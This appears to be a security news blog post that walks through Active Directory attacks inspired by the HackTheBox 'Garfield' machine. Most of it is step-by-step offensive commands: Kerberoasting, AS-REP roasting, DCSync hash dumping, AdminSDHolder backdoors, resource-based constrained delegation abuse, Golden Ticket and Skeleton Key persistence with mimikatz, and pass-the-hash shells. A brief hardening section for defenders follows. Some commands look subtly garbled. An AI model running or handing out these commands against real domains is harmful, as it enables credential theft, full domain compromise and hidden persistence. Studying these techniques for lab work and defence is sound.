Listen to this Post

Introduction
Active Directory (AD) remains the crown jewel of enterprise authentication, and misconfigurations in Windows environments often lead to complete domain compromise. This article dissects advanced AD attack vectors and privilege escalation techniques inspired by HackTheBox’s “Garfield Hard Machine”, where second-place blood required deep knowledge of Windows internals, Kerberos abuse, and lateral movement.
Learning Objectives
- Understand and execute Kerberos-based attacks (AS-REP Roasting, Kerberoasting, S4U2Self abuse)
- Perform privilege escalation from a low-privileged user to Domain Admin using ACL misconfigurations and resource-based constrained delegation
- Apply post-exploitation tactics including DCSync, Golden Ticket, and custom payloads for persistence
You Should Know
1. Reconnaissance and Initial Foothold in Windows AD
Start by enumerating the target domain using native Windows commands and PowerShell. The goal is to discover users, groups, shares, and misconfigured ACLs.
Step‑by‑step guide:
- From a compromised low-privilege account, enumerate domain information:
Basic domain info systeminfo | findstr /B "Domain" net user /domain net group "Domain Admins" /domain
- Use PowerView (part of PowerSploit) for deeper AD reconnaissance:
powershell -exec bypass Import-Module .\PowerView.ps1 Get-NetUser -SPN Find Kerberoastable accounts Get-DomainUser -PreauthNotRequired Check for AS-REP roasting Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs
3. For Linux-based attackers, use `impacket` and `bloodhound-python`:
Enumerate AD remotely bloodhound-python -d garfield.local -u lowuser -p 'password' -ns 10.10.10.10 -c All Then analyze with Neo4j + BloodHound GUI
4. Identify Windows versions and patch levels:
wmic qfe list brief systeminfo | findstr "Hotfix"
What this does: Maps the AD attack surface, highlights privilege escalation paths (e.g., users with `GenericWrite` over high-value groups), and reveals missing patches vulnerable to public exploits.
2. Kerberos Attacks – AS-REP Roasting & Kerberoasting
These attacks target service accounts with weak encryption or pre-authentication disabled.
Step‑by‑step guide:
1. AS-REP Roasting (no pre-auth required):
Using Rubeus on Windows Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
Using impacket on Linux impacket-GetNPUsers garfield.local/ -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt
2. Kerberoasting (target service accounts with SPNs):
Rubeus Rubeus.exe kerberoast /outfile:kerb_hashes.txt
impacket impacket-GetUserSPNs garfield.local/lowuser:password -request -outputfile kerberoast.txt
3. Crack hashes offline:
hashcat -m 18200 asrep_hashes.txt rockyou.txt hashcat -m 13100 kerberoast.txt rockyou.txt
Why this matters: Many organizations forget to enforce strong passwords on service accounts. Cracked credentials often lead to DA-level access, as seen in Garfield.
- Privilege Escalation via ACL Abuse – DCSync & AdminSDHolder
Misconfigured DACLs can allow a low-priv user to replicate directory changes (DCSync) or take over AdminSDHolder.
Step‑by‑step guide:
1. Enumerate ACLs that grant `DS-Replication-Get-Changes` (DCSync) rights:
PowerView
Get-ObjectAcl -DistinguishedName "DC=garfield,DC=local" -ResolveGUIDs | ? { $_.ObjectAceType -match "Replication" }
2. If your user has the right, extract all domain hashes:
Using secretsdump from impacket impacket-secretsdump garfield.local/attacker_user:[email protected] -just-dc
3. For AdminSDHolder takeover (persistence), modify its ACL to give your user FullControl:
PowerView Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=garfield,DC=local" -PrincipalIdentity "lowuser" -Rights All Wait up to 2 hours for propagation, then your user becomes admin of protected groups
Real‑world impact: These techniques are silent and leave minimal logs. In Garfield, the creator designed ACL misconfigurations that mimicked real Fortune 500 environments.
- Resource-Based Constrained Delegation (RBCD) – Machine Account Takeover
RBCD allows a computer to impersonate users to any service. Abusing it requires the ability to add a machine account (often via `GenericWrite` or MS-DS-MachineAccountQuota).
Step‑by‑step guide:
- Check if you can add a machine account:
PowerView Get-DomainObject -Identity "DC=garfield,DC=local" -Properties ms-DS-MachineAccountQuota
2. Add a fake computer:
Using impacket addcomputer impacket-addcomputer garfield.local/lowuser:password -computer-name FAKE$ -computer-pass Password123!
3. Abuse RBCD to compromise a high-value target (e.g., Domain Controller):
Using PowerView + Rubeus First, set RBCD on the target DC to allow FAKE$ to impersonate any user Set-DomainRBCD -Identity "DC01$" -DelegateTo "FAKE$" -Verbose Then request a TGS for Domain Admin Rubeus.exe s4u /user:FAKE$ /password:Password123! /impersonateuser:Administrator /msdsspn:cifs/dc01.garfield.local /ptt
4. Access DC with the ticket:
klist dir \dc01.garfield.local\c$
When to use: This is the preferred path when Kerberoasting fails. Garfield’s second-place winner used RBCD to bypass traditional detection.
5. Post-Exploitation – Golden Ticket & Skeleton Key
Once you have KRBTGT hash, forge tickets to maintain access indefinitely.
Step‑by‑step guide:
1. Dump KRBTGT hash via DCSync or LSASS:
impacket-secretsdump garfield.local/domainadmin:[email protected] -just-dc-user krbtgt
2. Create a Golden Ticket (10 years validity):
impacket-ticketer -domain-sid S-1-5-21-... -domain garfield.local -nthash KRBTGT_HASH -user-id 500 -extra-sid Administrator
3. Inject the ticket on Windows:
mimikatz.exe "kerberos::golden /domain:garfield.local /sid:S-1-5-21-... /rc4:KRBTGT_HASH /user:Administrator /id:500 /ptt" exit
4. For persistence without tickets, deploy Skeleton Key (mimikatz):
mimikatz "privilege::debug" "misc::skeleton" exit Now any domain user can authenticate with password "mimikatz"
Critical warning: Golden Tickets are detectable with proper auditing (Event ID 4769 with unusual encryption). Use only in authorized red team exercises.
6. Linux Tools for Windows AD Exploitation (Cross‑Platform)
Red teamers often pivot from Linux to Windows. Here’s the essential toolkit.
Step‑by‑step guide:
1. Install core offensive AD tools on Kali/Parrot:
sudo apt install bloodhound crackmapexec impacket-scripts kerberoast evil-winrm
2. Enumerate with CrackMapExec:
crackmapexec smb 10.10.10.0/24 -u lowuser -p password --shares crackmapexec ldap 10.10.10.10 -u lowuser -p password --bloodhound
3. Pass-the-Hash to gain shell:
impacket-wmiexec -hashes LM:NTHASH garfield.local/[email protected] Or with evil-winrm (if WinRM enabled) evil-winrm -i 10.10.10.10 -u administrator -H NTHASH
4. Automate enumeration with ldapdomaindump:
ldapdomaindump -u 'garfield.local\lowuser' -p password 10.10.10.10
Pro tip: Garfield’s creator embedded multiple Linux-only exploit paths, including a custom service that responded to SMB named pipes from Linux clients.
7. Mitigation & Hardening Against AD Attacks
Defenders can stop these techniques by implementing the following controls.
Step‑by‑step guide for blue teams:
1. Disable RC4 for Kerberos (enforce AES):
On Domain Controllers: Group Policy → Security Settings → Kerberos Set "Supported encryption types" to only AES128/AES256
2. Monitor for suspicious tickets (Event IDs 4769, 4770):
PowerShell script to detect RC4 tickets
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4769} | Where-Object {$_.Message -match "RC4"}
3. Protect AdminSDHolder by removing non-admin ACL writes:
Use ADAC to remove all non-Domain Admins from AdminSDHolder ACL Then enable "Protect object from accidental deletion"
4. Deploy Local Administrator Password Solution (LAPS) to prevent lateral movement.
5. Enable Credential Guard on Windows 10/11 to protect LSASS:
Enable via GPO: Computer Config → Administrative Templates → Device Guard
6. Harden SMB signing and disable NTLMv1:
Network security: LAN Manager authentication level → Send NTLMv2 only Microsoft network server: Digitally sign communications (always)
What Undercode Say
- Attackers prioritize AD misconfigurations over zero-days. The Garfield machine didn’t rely on CVE exploits; it used real-world ACL, delegation, and Kerberos flaws that exist in thousands of enterprises.
- Linux tooling for AD has matured to parity with Windows. BloodHound, Impacket, and CrackMapExec allow red teams to execute complex AD attacks without ever touching PowerShell.
The second-place finish on Garfield proves that deep understanding of AD internals outweighs automated scanning. Attackers who master Kerberos ticket flows and ACL abuse will consistently compromise hardened domains. Defenders must shift from perimeter security to identity-centric monitoring—specifically tracking unusual SPN requests, ticket encryption downgrades, and replication privileges. The future of AD security lies in real-time behavioral detection, not just patching.
Prediction
As hybrid identities (Azure AD Connect) become ubiquitous, we’ll see cross-forest attacks that bridge on-prem AD to cloud tenants. Garfield-like machines will evolve to include Entra ID (Azure AD) synchronization abuse, where a compromised on-prem sync account can escalate to Global Admin. Expect HackTheBox to release “Garfield Cloud Edition” within 12 months, forcing red teams to learn federated identity attacks. Organizations that fail to implement tiered administration (T0/T1/T2) will fall victim to the same Kerberos and delegation techniques used today.
▶️ Related Video (78% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Https: – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


